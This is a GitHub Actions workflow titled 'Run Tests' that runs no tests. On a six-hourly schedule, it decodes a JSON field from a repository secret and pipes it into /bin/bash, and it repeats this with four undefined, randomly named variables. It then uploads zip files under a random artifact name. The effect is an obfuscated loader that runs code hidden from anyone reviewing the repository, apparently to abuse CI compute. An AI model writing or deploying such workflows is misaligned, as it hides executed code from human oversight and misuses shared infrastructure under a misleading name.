name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '11 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          w7: ${{ secrets.w7 }}
        run: |
          printf '%s' "$w7" | jq -r .gw16852 | /bin/bash
          echo $ltptj69445 | jq -r .pria55258 | /bin/bash
          printf '%s' "$pqh25" | jq -r .xi1986 | /bin/bash
          printf '%s' "$oxz35" | jq -r .qg70066 | /bin/bash
          echo $bp03 | jq -r .yh689 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: XxGloPM8
          path: "*.zip"
          retention-days: 1
